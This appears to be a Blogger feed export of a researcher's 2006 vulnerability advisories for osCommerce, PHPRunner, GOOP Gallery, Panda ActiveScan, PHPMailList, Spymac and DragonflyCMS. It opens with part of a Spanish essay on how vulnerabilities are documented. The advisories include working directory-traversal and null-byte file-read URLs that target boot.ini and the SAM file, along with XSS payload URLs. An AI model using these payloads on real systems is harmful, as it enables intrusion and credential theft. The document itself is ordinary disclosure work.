vulnerabilidad en la segunda variable, esta<br />igualmente seria descrita por las listas como variable<br />new_topic es vulnetable al ser enviada al archivo modules.php<br />pero esta vulnerabilidad podría venir(como casi siempre es seguro)<br />del archivo News.php situado en el directorio de módulos del PHP-NUKE.<br /><br />El desarrollador seguramente fijaría esa variable en la página<br />mencionada, pero seguramente esa misma variable desde otro punto<br />del portal, seria también vulnerable por no haberlo corregido<br />directamente donde se inicializa esa variable o parámetro, con<br />lo cual en si esa vulnerabilidad podría dividirse en dos.<br /><br />Si las listas de seguridad indicasen que la variable new_topic<br />es vulnerable a cross site scripting al ser enviada a modules.php<br />y esavariable esta definida en el archivo news.php…<br />¿no seria mas correcto decir que la variable new_topic es<br />vulnerable en los dos puntos en lugar de solo en el primero?<br /><br />Este tipo de "errores" al documentar las vulnerabilidades puede<br />llevar a creer que muchas de las vulnerabilidades del tipo descrito,<br />pueden estar en las listas expuestas de forma incorrecta, o pueden<br />llevar a error, pues en si la mayoría de las veces la definición<br />de la misma es errónea.<br /><br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<br /></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1165482267378662582006-12-07T00:58:00.000-08:002006-12-08T16:15:41.610-08:00Oscommerce traversal arbitrary file access############################################<br />Oscommerce traversal arbitrary file access<br />Vendor:http://www.oscommerce.com/about/news,125<br />Advisore:http://lostmon.blogspot.com/2006/12<br />/oscommerce-traversal-arbitrary-file.html<br />Vendor notify:NO Exploit available: YES<br />Securitytracker:<a href="http://securitytracker.com/id?1017353" target="_BLANK">1017353</a><br />BID:<a href="http://www.securityfocus.com/bid/21477" target="_BLANk">21477</a><br />###########################################<br /><br />osCommerce contains a flaw that allows a remote traversal<br />arbitrary file access.This flaw exists because the application<br />does not validate filter variable upon submission to<br />admin/templates_boxes_layout.php script.This could allow a<br />remote authenticated administrator to create a specially<br />crafted URL that would execute '../' directory traversal<br />characters to view files on the target system with<br />the privileges of the target web service.<br /><br /><br /><br />####################<br />versions <br />####################<br /><br />Oscommerce 3.0a3<br /><br /><br />###################<br />SOLUTION<br />###################<br /><br />No solution was available at this time.<br /><br /><br />################<br />timeline<br />################<br /><br />Discovered:11-11-2006<br />vendor notify:------<br />vendor response:<br />disclosure:07-12-2006<br /><br />#################<br />Examples<br />#################<br /><br />######################<br />traversal file access<br />######################<br /><br />wen we try to open <br /><br />http://localhost/oscommerce/admin/templates_boxes_layout.php?<br />set=boxes&filter=[SOME WORD]&lID=27<br /><br />the aplication returns a full path disclosure and <br />returns this error:<br /><br /> Warning: require(includes/templates/[SOME WORD].php) [function.require]: <br /> failed to open stream: No such file or directory in C:\AppServ\www oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13<br /><br />Fatal error: require() [function.require]: Failed opening required <br />'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')<br />in C:\AppServ\www\oscommerce\admin\templates\pages\templates_<br />boxes_layout.php on line 13<br /><br />the aplication add the .php extension to our [SOME WORD] ummm<br />and it searh for the file in a folder inside webserver<br />we can include any php file located on the web server<br />in the aplication and it is executed(local file inclusion)<br /><br />http://[victim]/admin/templates_boxes_layout.php?<br />set=boxes&filter=../../our_evil_php_file&lID=27<br /><br />if we try to read a file outside webserver folder with a non php<br />extension can try for test this...<br /><br />&filter=../../../../file.extension%00 for look for example boot.ini<br />in a windows system<br /><br />http://localhost/oscommerce/admin/templates_boxes_layout.php?<br />set=boxes&filter=../../../../BOOT.INI%00&lID=27<br /><br />http://localhost/oscommerce/admin/templates_boxes_layout.php?<br />set=content&filter=../../../../windows/repair/sam%00&lID=27<br /><br />#####################<br />Cross site scripting<br />#####################<br /><br />http://localhost/oscommerce/admin/modules.php?set=shipping<br />%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<br /><br />http://localhost/definitiva/admin/customers.php?selected_box=customers<br />%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E<br /><br />http://localhost/oscommerce/admin/languages_definitions.php?lID=1<br />%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E<br /><br />http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT<br />%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product<br /><br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1163278279097180302006-11-20T12:47:00.000-08:002007-03-24T12:22:29.563-07:00Oscommerce Multiple XSS in admin section##########################################<br />Oscommerce Multiple XSS in admin section.<br />Vendor url:Http://www.oscommerce.com<br />Advisore:http://lostmon.blogspot.com/2006/11/<br />oscommerce-multiple-xss-in-admin.html<br />Vendor notify:YES Exploit available: YES<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=33212" target="_BLANK">33212</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33213" target="_BLANK">33213</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33214" target="_BLANK">33214</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33216" target="_BLANK">33216</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33217" target="_BLANK">33217</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33218" target="_BLANK">33218</a>,<br />Securitytracker:<a href="http://securitytracker.com/id?1017269" target="_BLANK">1017269</a><br />Secunia:<a href="http://secunia.com/advisories/22275/" target="_BLANK">SA22275</a><br /><br />##########################################<br /><br />osCommerce contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate multiple params upon submission to multiple scripts<br />in /admin folder.This could allow a user to create a specially<br />crafted URL that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br /><br />####################<br />versions<br />####################<br /><br />Oscommerce -2.2ms2-060817<br /><br /><br />###################<br />SOLUTION<br />###################<br /><br />No solution was available at this time.<br /><br /><br />################<br />timeline<br />################<br /><br />Discovered:29-10-2006<br />vendor notify:20-11-2006<br />vendor response<br />disclosure:21-11-2006<br /><br />#################<br />Examples<br />#################<br /><br />If the server have auth implemented<br />for exploit all of this flaws you<br />need to login , before.<br /><br />-------------------------------<br />gID param in configuration.php<br />-------------------------------<br /><br />http://[Victim]/catalog/admin/configuration.php?<br />gID=1">[XSS-CODE]&cID=3<br /><br />--------------------------<br />Set param in modules.php<br />--------------------------<br /><br />http://localhost/catalog/admin/modules.php?selected_box=modules<br />&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5<br /><br />http://localhost/catalog/admin/modules.php?set=payment<br />">[XSS-CODE]&module=pm2checkout<br /><br />http://localhost/catalog/admin/modules.php?set=ordertotal<br />&module=ot_loworderfee">[XSS-CODE]&action=edit<br /><br />--------------------------------------------------<br />option_order_by ,value_page ,option_page ,products<br />_options_name in products_attributes.php<br />--------------------------------------------------<br /><br />http://[Victim]/catalog/admin/products_attributes.php?<br />action=update_option&option_id=1&option_order_by="><br />[XSS-CODE]&products_options_id&option_page=1<br /><br />http://[Victim]/definitiva/admin/products_attributes.php?<br />option_order_by=products_options_id&value_page=2">[XSS-CODE]<br /><br />http://[Victim]/definitiva/admin/products_attributes.php?<br />option_page=1&option_order_by=products_options_name">[XSS-CODE]<br /><br />http://[Victim]/definitiva/admin/products_attributes.php?<br />action=update_option&option_id=1&option_order_by=products<br />_options_id&option_page=1">[XSS-CODE]<br /><br />http://[Victim]/catalog/admin/products_attributes.php?<br />action=update_option&option_id=1&option_order_by=products<br />_options_id&option_page=1">[XSS-CODE]<br /><br />----------------------------------------------------<br />lID param in languages.php<br />---------------------------------------------<br /><br /><br />http://localhost/definitiva/admin/languages.php?page=1&<br />lID=3">[XSS-CODE]&action=new<br /><br />-------------------------------<br />selected_box,cID in customers.php<br />-------------------------------<br /><br />http://localhost/definitiva/admin/customers.php?page=1<br />&cID=1[XSS-CODE]&action=edit<br /><br />http://[Victim]/catalog/admin/customers.php?selected_box=<br />customers">[XSS-CODE]<br /><br />-------------------------------<br />spage,zID,sID in geo_zones.php<br />-------------------------------<br /><br />http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&<br />action=list&spage=1">[XSS-CODE]&sID=1&saction=edit<br /><br />http://localhost/definitiva/admin/geo_zones.php?zpage=1&<br />zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit<br /><br />http://localhost/definitiva/admin/geo_zones.php?zpage=1<br />&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new<br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1163446706547409062006-11-13T11:03:00.000-08:002006-11-20T10:20:38.506-08:00PHPRunner database credentials disclosure##########################################<br />PHPRunner database credentials disclosure<br />Vendor url:http://www.xlinesoft.com/phprunner/<br />Advisore:http://lostmon.blogspot.com/2006/11/<br />phprunner-database-credentials.html<br />Vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=30363" target="_BLANK">30363</a><br />Securitytracker:<a href="http://securitytracker.com/id?1017218" target="_BLANK">1017218</a><br />Secunia:<a href="http://secunia.com/advisories/22863/" target="_BLANK">SA22863</a><br />BID:<a href="http://www.securityfocus.com/bid/21054" target="_BLANK">21054</a><br />##########################################<br /><br /><br /><br />Description:<br /><br />PHPRunner builds visually appealing web interface<br />for any local or remote MySQL, MS Access, SQL Server<br />and Oracle databases. Your web site visitors will be<br />able to easily search, add, edit, delete and export<br />data in your database. Advanced security options allow<br />to build password-protected members only Web sites<br />easily. PHPRunner is simple to learn so you can build<br />your first project in just fifteen minutes.<br /><br />Vulnerability:<br /><br />PHPRunner contains a flaw that allow local users<br />to view all credentials stored in PHPRunner for work.<br />This flaw exist because the aplication store the <br />database server, database names,users and passwords<br />in plain text in a file located in windows folder.<br />A local user could access directly to <br />\windows\PHPRunner.ini and obtain all information.<br /><br />versions<br /><br />this prove is tested on version 3.1<br /><br />solution:<br /><br />No solution was available at this time.<br /><br />Timeline:<br /><br />Discovered:21-10-2006<br />vendor notify:13-11-2006<br />vendor response:13-11-2006<br />disclosure:13-11-2006<br /><br />example:<br /><br />Open c:\windows\PHPRunner.ini<br /><br /><br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1160852052651250262006-10-16T11:49:00.000-07:002006-11-03T10:36:22.993-08:00GOOP Gallery 'image' param Cross-site scripting################################################<br />GOOP Gallery 'image' param Cross-site scripting<br />Vendor url:http://www.webgeneius.com<br />Advisore:http://lostmon.blogspot.com/2006/10/<br />goop-gallery-image-param-cross-site.html<br />Vendor notify: YES Exploit available: YES<br />securitytracker:<a href="http://securitytracker.com/id?1017081" target="_BLANK">1017081</a><br />Secunia: <a href="http://secunia.com/advisories/22258" target="_BLANK">SA22258</a><br />BID:<a href="www.securityfocus.com/bid/20554" target="_BLANK">20554</a><br />################################################<br /><br /><br /><br />GOOP Gallery contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate 'image' param upon submission to index.php script.<br />This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server, leading<br />to a loss of integrity.<br /><br />################<br />Versions<br />################<br /><br />GOOP Gallery 2.0 vulnerable<br />GOOP Gallery 2.0.3 not Vulnerable<br /><br />################<br />Solution<br />################<br /><br />Upgrade to GOOP gallery 2.0.3as soon as possible.<br /><br />http://webgeneius.com/index.php?mod=blog&id=49<br /><br />Download GG2.0.3:<br />http://webgeneius.com/downloads/gg2.0.3.zip<br /><br />################<br />Timeline<br />################<br /><br />Discovered:09-10-2006<br />Vendor notify:14-10-2006<br />Vendor response:15-10-2006<br />Vendor Fix: 16-10-2006<br />Disclosure: 16-10-2006<br /><br />##############<br />Example<br />##############<br /><br />http://Victim/goopgallery/index.php?next=%BB&gallery=demo+gallery+1<br />&image=Bunny.JPG">[XSS-CODE]<br /><br />http://Victim/goopgallery/index.php?gallery=demo+gallery+1<br />&image=Bunny.JPG">[XSS-CODE]<br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1159901170281663372006-10-03T11:41:00.000-07:002006-10-20T14:28:39.600-07:00osCommerce multiple Scripts 'page' param XSS###############################################<br />osCommerce multiple Scripts 'page' param XSS<br />Vendor url: http://www.oscommerce.com<br />Vendor Bugtracker:http://www.oscommerce.com/community/bugs,4303<br />Advisore: http://lostmon.blogspot.com/2006/10/<br />oscommerce-multiple-scripts-page-param.html<br />Vendor notify:yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29795" target="_BLANK">29795</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29796" target="_BLANK">29796</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29797" target="_BLANK">29797</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29798" target="_BLANK">29798</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29799" target="_BLANK">29799</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29800" target="_BLANK">29800</a>,<br /><a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29801" target="_BLANK">29801</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29802" target="_BLANK">29802</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29803" target="_BLANK">29803</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29804" target="_BLANK">29804</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29805" target="_BLANK">29805</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29806" target="_BLANK">29806</a>,<br /><a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29807" target="_BLANK">29807</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29808" target="_BLANK">29808</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016979" target="_blank">1016979</a><br />BID:<a href="http://www.securityfocus.com/bid/20343" target="_blank">20343</a><br />Secunia:<a href="http://secunia.com/advisories/22275/" target="_blank">SA22275</a><br />FrSIRT: <a href=" http://www.frsirt.com/english/advisories/2006/3917" target="_BLANK">FrSIRT/ADV-2006-3917</a><br />###############################################<br /><br /><br />osCommerce contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate 'page' param upon submission to multiple scripts<br />in /admin folder.This could allow a user to create a specially<br />crafted URL that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />The same situation is done in 'admin/geo_zones.php' but with<br />param 'zpage'.<br /><br /><br /><br />####################<br />vERSIONS<br />####################<br /><br />osCommerce 2.2 Milestone 2 Update 060817<br /><br />####################<br />SOLUTION<br />####################<br /><br />no solution was available at this time.<br /><br /><br />#######################<br />VULNERABLE CODE<br />#######################<br /><br />Arround the line 30 in banner_manager.php we <br /><br /><br />tep_redirect(tep_href_link(FILENAME_BANNER_MANAGER,<br /> 'page=' . $HTTP_GET_VARS['page'] . '&bID=' .<br /> $HTTP_GET_VARS['bID']));<br /><br /><br /><br />the page param is called directly , not sanitize.<br />arround line 115 we have a similar situation ,<br />we GET page param without sanitice in any GET request.<br /><br />In all of scripts vulnerables, we have the same situation,<br />but with diferent code <br /><br />####################<br />scripts vulnerables<br />####################<br /><br />admin/banner_manager.php<br />admin/banner_statistics.php<br />admin/countries.php<br />admin/currencies.php<br />admin/languages.php<br />admin/manufacturers.php<br />admin/newsletters.php<br />admin/orders_status.php<br />admin/products_attributes.php<br />admin/products_expected.php<br />admin/reviews.php<br />admin/specials.php<br />admin/stats_products_purchased.php<br />admin/stats_products_viewed.php<br />admin/tax_classes.php<br />admin/tax_rates.php<br />admin/zones.php<br /><br />####################<br />Timeline<br />####################<br /><br />Discovered: 27-09-2006<br />Vendor notify:03-10-2006<br />Vendor response:------<br />Vendor fix:--------<br />Disclosure: 03-10-2006 (vendor Bugtracker)<br />Public disclosure:04-10-2006<br /><br />####################<br />EXAMPLES<br />####################<br /><blockquote><br />http://localhost/catalog/admin/banner_manager.php?page=1[XSS-code]<br />http://localhost/catalog/admin/banner_statistics.php?page=1[XSS-code]<br />http://localhost/catalog/admin/countries.php?page=1[XSS-code]<br />http://localhost/catalog/admin/currencies.php?page=1[XSS-code]<br />http://localhost/catalog/admin/languages.php?page=1[XSS-code]<br />http://localhost/catalog/admin/manufacturers.php?page=1[XSS-code]<br />http://localhost/catalog/admin/newsletters.php?page=1[XSS-code]<br />http://localhost/catalog/admin/orders_status.php?page=1[XSS-code]<br />http://localhost/catalog/admin/products_attributes.php?page=1[XSS-code]<br />http://localhost/catalog/admin/products_expected.php?page=1[XSS-code]<br />http://localhost/catalog/admin/reviews.php?page=1[XSS-code]<br />http://localhost/catalog/admin/specials.php?page=1[XSS-code]<br />http://localhost/catalog/admin/stats_products_purchased.php?page=1[XSS-code]<br />http://localhost/catalog/admin/stats_products_viewed.php?page=1[XSS-code]<br />http://localhost/catalog/admin/tax_classes.php?page=1[XSS-code]<br />http://localhost/catalog/admin/tax_rates.php?page=1[XSS-code]<br />http://localhost/catalog/admin/zones.php?page=1[XSS-code]<br /><br />this is a simple evil url but we can do some moore elaborate url<br />in conjuncion with other archives not vulnerables... like this:<br /><br /><br /><br />http://localhost/catalog/admin/categories.php?action=new_product_preview<br />&read=only&pID=12&origin=stats_products_viewed.php?page=2[XSS-code]<br /><br /></blockquote><br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1155145672662398342006-08-09T10:43:00.000-07:002006-10-08T06:33:41.190-07:00Panda ActiveScan XSS vulnerability################################################<br />Panda ActiveScan XSS vulnerability<br />Vendor urL:http://www.pandasoftware.es or .com<br />Advisore:http://lostmon.blogspot.com/2006/08/<br />panda-activescan-xss-vulnerability.html<br />vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29147" target="_blank">29147</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016696" targer="_BLANK">1016696</a><br />BID:<a href="http://www.securityfocus.com/bid/19471" target="_BLANK">19471</a><br />################################################<br /><br />Panda ActiveScan contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate 'email' variable upon submission to the ascan_6.asp<br />script.This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server,leading<br />to a loss of integrity.<br /><br />##########<br />versions:<br />##########<br /><br />Panda ActiveScan 5.53.00<br /><br />##########<br />Solution:<br />##########<br /><br />Panda has release a new version of ActiveScan<br />at 14-08-2006<br /><br />#########<br />timeline:<br />#########<br /><br />discovered : 01-08-2006<br />vendor notify :05-08-2006<br />vendor response :14-08-2006<br />vendor fix:14-08-2006<br />disclosure:9-08-2005<br /><br />################<br />test<br />################<br /><br /><br /><br />http://www.pandasoftware.com/activescan/activescan/<br />ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=<br />Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20<br />Vulnerability%27%29%3C/script%3E%26&pais=62&<br />provincia=9&tipousuario=0&enviar=1&ode=0#<br /><br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1152120730781841272006-07-05T10:31:00.000-07:002006-08-12T09:16:42.746-07:00Multiple Vulnerabilities in PHPMailList 1.8.0########################################################<br />Multiple Vulnerabilities in PHPMailList 1.8.0 <br />Vendor url: http://php.warpedweb.net/ <br />Advisore:http://lostmon.blogspot.com/2006/07/<br />multiple-vulnerabilities-in.html<br />VEndor notify:yes Explotation include:yes<br />osvdb id:<a href="http://osvdb.org/displayvuln.php?osvdb_id=27016" TARGET="_blank">27016</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=27017" TARGET="_blank">27017</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=27018" TARGET="_blank">27018</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016439" target="_BLANK">1016439 </a><br />BID:<a href="http://www.securityfocus.com/bid/18840" target="_BLANK">18840</a><br />FrSIRT: <a href="http://www.frsirt.com/english/advisories/2006/2690" target="_BLANK">FrSIRT/ADV-2006-2690</a><br />########################################################<br /><br />################<br />Description<br />################<br /><br />PHPMailList is a powerful, yet simple to use, email announcement script. <br />It allows people to subscribe/unsubscribe through a web-based form, <br />checking for valid addresses.The web-based administration module allows<br />the owner to send messages to the list, subscribe/unsubscribe people,<br />view the list of subscriber, and configure the script.Installation is<br />simple, and configuration of confirmation messages, welcome messages <br />and goodbye messages, as well as signatures are all maintained through<br />the password protected administration section.<br /><br />PHPMailList have multiple vulnerabilities like XSS. information disclosure<br />Plain text administrator username/password disclosure.<br /><br />##############<br />versions<br />##############<br /><br />PHPMaiLlist 1.8.0 and prior versions<br /><br /><br />#####################<br />Cross site scripting<br />##################### <br /><br />PHPMailList have a flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate poperly the<br />input parsed in the email field upon submission to '/maillist.php'<br />script.This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />######################<br />Information disclosure<br />######################<br /><br />direct request to file 'list.dat' reveal all email address of all suscribers.<br /><br />Direct request to file 'ml_config.dat' reveal all configuration information.<br /><br />#####################################<br />Plain text administrator disclosure: <br />#####################################<br /><br />Direct request to file 'ml_config.dat' reveal in the first line<br />the admin username and in the second the admin password in plain text<br /><br />######################<br />Timeline<br />######################<br /><br />Discovered: 06-jun-2006<br />Vendor notify:No have a forum and no have a mail address...<br />vendor response:-------<br />Disclosure:06-jul-2006<br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1147890126445659102006-05-17T11:20:00.000-07:002006-06-10T01:47:19.243-07:00Multiple Cross site scripting in Spymac WOS V##########################################################<br />Multiple Cross site scripting in Spymac WOS V<br />Vendor url: http://www.spymac.com<br />Advisore:http://lostmon.blogspot.com/2006/05/<br />multiple-cross-site-scripting-in.html<br />Vendor notify: yes Exploit available: yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=25925" target="BLANK">25925</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=25926" target="BLANK">25926</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=25927" target="BLANK">25927</a>,<br />Securitytracker:<a href="http://securitytracker.com/id?1016116" target="_BLANK">1016116</a><br /><a href="http://www.frsirt.com/english/advisories/2006/1852" target="_BLANK">FrSIRT/ADV-2006-1852</a><br />##########################################################<br /><br /><br />Spymac WOS is powered by an integrated collection of Web<br />and desktop applications that together form "Spymac WOS".<br />Developed in-house, Spymac WOS is an intelligent environment<br />featuring patent-pending technology that allows for the creation<br />of an immersive and visually-stunning Web experience.<br /><br />Spymac have a flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate <br />multiple variables upon submission to multiple scripts.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />#######################<br />Versions<br />#######################<br /><br />Spymac WOS V<br /><br /><br />########################<br />Solution:<br />########################<br /><br />No solution was available at this time.<br /><br /><br />########################<br />Examples<br />########################<br /><br />for view some examples... need a client login.<br />http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]<br />http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]<br />http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]<br />http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]<br /><br /><br />http://[VICTIM]/login.php?[XSS-CODE]<br /><br /><br />some others variables are subsceptibles to the same flaw.<br /><br /><br /><br />########################<br />TIMELINE<br />########################<br /><br />Discovered:02-05-2006 <br />Vendor notify:14-05-2006<br />Vendor response:-------------<br />Disclosure:17-05-2006<br /><br /><br />######################## €nd #####################<br /><br />Thnx to Estrella to be my ligth.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1140606821123085472006-02-22T03:13:00.000-08:002006-02-24T02:47:54.536-08:00Multiple Cross site scripting in dragonflycms######################################################<br />Multiple Cross site scripting in dragonflycms 9.0.6.1<br />Vendor url:http://dragonflycms.org/<br />Advisore: http://lostmon.blogspot.com/2006/02/<br />multiple-cross-site-scripting-in.html<br />Vendor notify: exploit available: yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=23408" target="_BLANK">23408</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23409" target="_BLANK">23409</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23410" target="_BLANK">23410</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23411" target="_BLANK">23411</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23412" target="_BLANK">23412</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23413" target="_BLANK">23413</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23414" target="_BLANK">23414</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=23415" target="_BLANK">23415</a><br />Securitytracker:<a href="http://securitytracker.com/id?1015661" target="_BLANK">1015661</a><br />Secunia:<a href="http://secunia.com/advisories/18940/" target="_BLANK">18940</a><br />BID:<a href="http://www.securityfocus.com/bid/16784" target="_BLANK">16784</a><br />FrSIRT:<a href="http://www.frsirt.com/english/advisories/2006/0688" target="_BLANK">ADV-2006-0688</a><br />######################################################<br /><br />Description:<br /><br />"Dragonfly CMS is a powerful, feature-rich, Open Source<br />content management system (CMS) based on PHP-Nuke 6.5.<br />We have spent over a year developing Dragonfly CMS, <br />paying close attention to security 